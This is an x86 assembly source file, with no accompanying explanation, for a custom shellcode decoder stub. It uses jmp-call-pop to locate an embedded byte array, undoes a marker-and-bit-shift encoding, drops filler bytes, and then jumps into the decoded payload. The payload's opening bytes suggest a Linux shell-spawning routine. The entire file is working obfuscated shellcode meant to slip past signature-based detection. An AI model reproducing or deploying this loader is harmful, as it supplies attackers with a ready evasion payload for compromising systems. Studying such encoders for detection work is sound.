global _start

section .text

_start:
        jmp short call_decoder

decoder:
        pop esi
        lea edi, [esi]
        xor eax, eax
        xor ebx, ebx

scanner:
        mov bl, byte [esi + eax]
        cmp bl, 0xaa
        jz shellcode
        mov bl, byte [esi + eax]
        cmp bl, 0xff
        jz real_decoder
        mov bl, byte [esi + eax]
        mov byte [edi], bl
        inc edi
        add al, 2
        jmp short scanner

real_decoder:
        mov bl, byte [esi + eax + 1]
        shr bl, 1
        mov byte [edi], bl
        inc edi
        add al, 3
        jmp short scanner

call_decoder:
        call decoder
        shellcode: db 0xff,0x62,0x3c,0xc0,0x1c,0xff,0xa0,0x55,0xff,0xd0,0xe9,0xff,0x5e,0xc4,0xff,0x5e,0xfc,0xff,0xe6,0x55,0xff,0xd0,0xb1,0xff,0xd0,0x4b,0xff,0x5e,0x62,0xff,0xc4,0xd8,0xff,0xd2,0xeb,0xff,0xdc,0x35,0x89,0x54,0xe3,0xec,0xff,0xa0,0x74,0x89,0x6f,0xe2,0xe5,0xff,0xa6,0xd3,0x89,0x1e,0xe1,0xc7,0xb0,0x44,0xff,0x16,0x88,0xcd,0xb7,0x80,0x41,0xaa

